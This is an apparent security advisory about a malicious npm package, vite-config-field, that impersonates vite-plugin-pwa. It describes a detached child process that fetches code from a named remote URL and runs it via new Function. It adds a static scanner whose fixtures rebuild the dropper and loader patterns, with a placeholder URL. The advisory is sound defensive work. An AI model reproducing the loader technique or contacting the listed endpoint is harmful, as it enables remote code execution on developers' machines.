MAL-2026-5936
Malicious code in vite-config-field (npm)
Details
## Source: amazon-inspector (d52d1d84d7572baf6a74539864b64d5b5c803f828fc82a1dae4de2dfebdb986f)

Package impersonates the legitimate `vite-plugin-pwa` (cloned description 'Zero-config PWA for Vite', repository `vite-pwa/vite-config-field`, funding link to `github.com/sponsors/antfu`, and exports matching the upstream API including `VitePWA`, `cachePreset`, and `configField`). When a consumer adds the plugin to their Vite config and the exported `configField()` runs, it invokes `getUseropt()`, which calls `child_process.spawn('node', ['./client/dev/reactopt.js',...], { detached: true, stdio: 'ignore' })` and unrefs the child. The spawned `dist/client/dev/reactopt.js` performs `axios.get('https://www.jsonkeeper.com/b/HIECD', { headers: { 'x-secret-key': '_' } })`, takes `response.data.Cookie`, and executes it with `new Function('require', s)(require)`: arbitrary remote code execution with full `require` capability, retrying 5 times. The C2 URL is disguised inside a fake `process.env` object (`DEV_API_KEY`/`DEV_SECRET_KEY`/`DEV_SECRET_VALUE`) to masquerade as environment-variable reads, and console output is silenced around the eval. The detached, stdio-ignored child means the dropper survives independently of the parent build/dev process.
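The indicators above (detached, stdio-ignored `spawn` plus `unref`, a remote fetch fed into `new Function('require', ...)`, a shadowed `process.env`, silenced `console`) can be checked statically in a dependency audit. The scanner below is an added example, not code from the advisory or the package; its regex rules and the three sample inputs are constructed, and the loader sample uses a placeholder URL rather than the real one.

```javascript
// Added example, not code from the advisory or the package: a static scanner
// that flags the source-level indicators described above in one JS file.
// Regex rules and the sample inputs below are constructed for illustration.
const RULES = [
  { id: 'detached-spawn', why: 'spawn() with detached:true and stdio:"ignore" (silent background child)',
    re: /spawn\s*\([\s\S]{0,300}?detached\s*:\s*true[\s\S]{0,100}?stdio\s*:\s*['"]ignore['"]/ },
  { id: 'unref-child', why: 'child.unref(): the child keeps running after the parent exits',
    re: /\.unref\s*\(\s*\)/ },
  { id: 'function-ctor-require', why: 'new Function("require", ...) hands fetched code full require()',
    re: /new\s+Function\s*\(\s*['"]require['"]/ },
  { id: 'remote-fetch', why: 'network fetch whose response may feed the dynamic code path',
    re: /\b(?:axios\.get|fetch)\s*\(/ },
  { id: 'fake-process-env', why: 'local object shadowing process.env (disguised configuration values)',
    re: /(?:const|let|var)\s+process\s*=\s*\{|process\.env\s*=\s*\{/ },
  { id: 'console-silenced', why: 'console method reassigned (output suppressed around execution)',
    re: /console\.(?:log|error|warn)\s*=(?!=)/ },
];

// Returns the matched rule ids and a coarse verdict for one file's source text.
function scanSource(src) {
  const hits = RULES.filter((r) => r.re.test(src)).map((r) => r.id);
  // Remote content passed to new Function(...) is the loader pattern itself.
  const remoteEval = hits.includes('function-ctor-require') && hits.includes('remote-fetch');
  const verdict = remoteEval ? 'malicious-loader' : hits.length >= 2 ? 'suspicious' : 'clean';
  return { hits, verdict };
}

// Constructed fixture shaped like the described dropper stage.
const DROPPER_SAMPLE = `
const { spawn } = require('child_process');
function getUseropt() {
  const child = spawn('node', ['./client/dev/reactopt.js'], { detached: true, stdio: 'ignore' });
  child.unref();
}`;

// Constructed fixture shaped like the described second stage; the URL is a placeholder.
const LOADER_SAMPLE = `
const axios = require('axios');
const process = { env: { DEV_API_KEY: 'https://example.invalid/PLACEHOLDER', DEV_SECRET_KEY: 'x-secret-key' } };
async function run() {
  const res = await axios.get(process.env.DEV_API_KEY, { headers: { [process.env.DEV_SECRET_KEY]: '_' } });
  const saved = console.log; console.log = () => {};
  new Function('require', res.data.Cookie)(require);
  console.log = saved;
}`;

// Constructed benign fixture: an ordinary foreground child process.
const BENIGN_SAMPLE = `
const { spawn } = require('child_process');
const child = spawn('git', ['status'], { stdio: 'inherit' });
child.on('close', (code) => console.log('exit', code));`;
```

Run `scanSource` over every `.js`/`.cjs`/`.mjs` file in an extracted tarball and treat `malicious-loader` as a hard block; `suspicious` is a review queue, since legitimate tooling occasionally backgrounds a child.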
Affected packages
No fixed version published yet for vite-config-field (npm). Pin to a known-safe version or switch to an alternative.